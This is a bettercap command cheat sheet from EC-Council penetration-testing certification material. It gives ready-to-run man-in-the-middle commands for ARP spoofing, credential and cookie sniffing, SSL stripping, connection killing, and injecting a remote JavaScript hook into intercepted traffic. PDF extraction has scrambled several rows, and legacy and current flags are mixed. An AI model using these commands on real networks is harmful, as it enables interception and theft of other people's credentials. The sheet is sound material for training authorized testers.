Certified Penetration Testing Professional Exam 412-80
bettercap Cheat Sheet
Certified Penetration Testing Professional
bettercap Cheat Sheet
bettercap
Source: https://www.bettercap.org
bettercap is a powerful, flexible, and portable tool and acts as a Swiss Army knife for Wi-Fi,
Bluetooth Low Energy, wireless HID hijacking, and Ethernet network reconnaissance and MITM
attacks. It can manipulate HTTP, HTTPS and TCP traffic in real-time to sniff the credentials
1. bettercap Options
2. Basic Module Commands
3. bettercap Commands
1. bettercap Options
Syntax
bettercap [Options]
Options
-h Get options
Comma separated list of modules to auto start. (default
-autostart string
"events.stream, net.recon")
Read commands from this file and execute them in the
-caplet <file>
interactive session
-cpu-profile <file> Write CPU profile file
-debug Print debug messages
Page | 1 Certified Penetration Testing Professional Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Certified Penetration Testing Professional Exam 412-80
bettercap Cheat Sheet
Load environment variables from this file if found, set to
-env-file <file>
empty to disable environment persistence
-eval Run one or more commands separated by ; in the interactive
<command1;command2> session, used to set variables via command line
-iface <interface> Specify the network interface that bettercap should bind to
-mem-profile <file> Write memory profile to file
-no-colors Disable output color effects
-no-history Disable interactive session history file
-silent Suppress all logs which are not errors
-version Print the version and exit
GUI Options
-C Use a curses GUI
-D Disable the GUI (daemon mode)
Sniffing Options
-X Enable Sniffer mode
-L Sniff one’s own host also and others
--sniffer-source
Specifies a FILE that you consume
<File>
--sniffer-output
Specifies a FILE that you write to
<File>
--sniffer-filter Specify a Berkeley Packet Filter (BPF) expression to filter
EXPRESSION packets captured by the sniffer module
List of parsers to use (COOKIE, CREDITCARD, DHCP, DICT, FTP,
-P <parser1,
HTTPAUTH, HTTPS, IRC, MAIL, MPD, MYSQL, NNTP, NTLMMS,
parser2,...>
PGSWL, POST, REDIS, RLOGIN, SNMP, SNPP, URL, WHATSAPP)
Spoofing Options
-S Spoof using ARP, ICMP, NONE
--kill Kills connections for any current targets
--half-duplex Works when the router is not MiTMable
Logging Options
--log <file> Log the output to somewhere
--silent Log the output with no terminal display
--log-timestamp Add a timestamp to logs
Page | 2 Certified Penetration Testing Professional Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Certified Penetration Testing Professional Exam 412-80
bettercap Cheat Sheet
2. Basic Module Commands
Command Description
events.stream on Start the events stream.
events.stream off Stop the events stream.
events.show LIMIT? Show the events stream (LIMIT is an optional parameter)
events.ignore FILTER Events with an identifier matching this filter will not be shown
Used to remove filters passed with the events.ignore
events.include FILTER
command
Clear the list of filters passed with
events.filters.clear
the events.ignore command
events.clear Clear the events stream buffer
events.waitfor TAG Wait for an event with the given tag either forever or for a
TIMEOUT? timeout in seconds
events.on TAG Define a new “trigger” that will run COMMANDS when an
COMMANDS event with the specified TAG is triggered
Show the list of event triggers created by
events.triggers
the events.on command
events.trigger.delete
Remove an event trigger given its TRIGGER_ID
TRIGGER_ID
events.triggers.clear Remove all event triggers
ticker on Start the ticker
ticker off Stop the ticker
caplets.show Show a list of installed caplets
caplets.paths Show a list caplet search paths
caplets.update Install/updates the caplets
3. bettercap Commands
Command Description
bettercap -X --no-spoofing Disable spoofing, cannot see one’s own traffic
sudo bettercap Default settings, spoofing but no decoding
bettercap -X Enable sniffer
Page | 3 Certified Penetration Testing Professional Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Certified Penetration Testing Professional Exam 412-80
bettercap Cheat Sheet
bettercap -XP HTTPS MiTM looking for HTTPS
bettercap -–log LOG_FILE Basic logging
bettercap -–log LOG_FILE -–silent Silent logging
bettercap –proxy-module –js-url Proxying: bettercap cannot just intercept
http://192.168.10.25:3100/hook.js traffic but can interact with it
sudo bettercap -eval To download and update caplets and web UI
"caplets.update; ui.update; q" from the latest GitHub releases
sudo bettercap -caplet http-ui To run both bettercap and the web UI
To run bettercap on another host and to
sudo bettercap -caplet https-ui connect to the UI and the API to be protected
by TLS
sudo bettercap -eval "set
Set the arp.spoof.targets parameter and
arp.spoof.targets 192.168.1.20;
enable the arp.spoof module
arp.spoof on"
sudo bettercap -eval "help To quickly get the help menu of a module and
net.recon; q" quit bettercap
read arp.spoof.targets "Select
To fill the arp.spoof.targets parameter
the target to spoof: "
Set the alias “MY IPAD” to the device with
alias DE:AD:DE:AD:BE:EF MY IPAD
MAC address DE:AD:DE:AD:BE:EF
sudo bettercap -eval "set
Start bettercap with full date and time format
events.stream.time.format Mon Jan
for events
2 15:04:05 -0700 MST 2006"
sudo bettercap -no-colors -eval Start bettercap without colors and terminal
"set events.stream.output effects and write events to the file
~/bettercap-events.log"
~/bettercap-events.log
sudo bettercap -iface eth0 -eval
Run bettercap using eth0 as the main
"set wifi.interface wlan0;
interface but start the wifi module on wlan0
wifi.recon on"
sudo bettercap -T
Attack specific target with its IP address
192.168.1.10,192.168.1.11
sudo bettercap -T
Attack a specific target by its MAC address
01:23:45:67:89:10
sudo bettercap -T 192.168.1.1-30 Attack a range of IP addresses
sudo bettercap -T 192.168.1.1/24 Attack a specific subnet
Randomize the interface MAC address during the
sudo bettercap --random-mac
attack
Page | 4 Certified Penetration Testing Professional Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Certified Penetration Testing Professional Exam 412-80
bettercap Cheat Sheet
sudo bettercap -T 192.168.1.2 --
Kill connections for a specific target
kill
sudo bettercap --no-sslstrip Disable SSL stripping and HSTS bypass
Page | 5 Certified Penetration Testing Professional Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.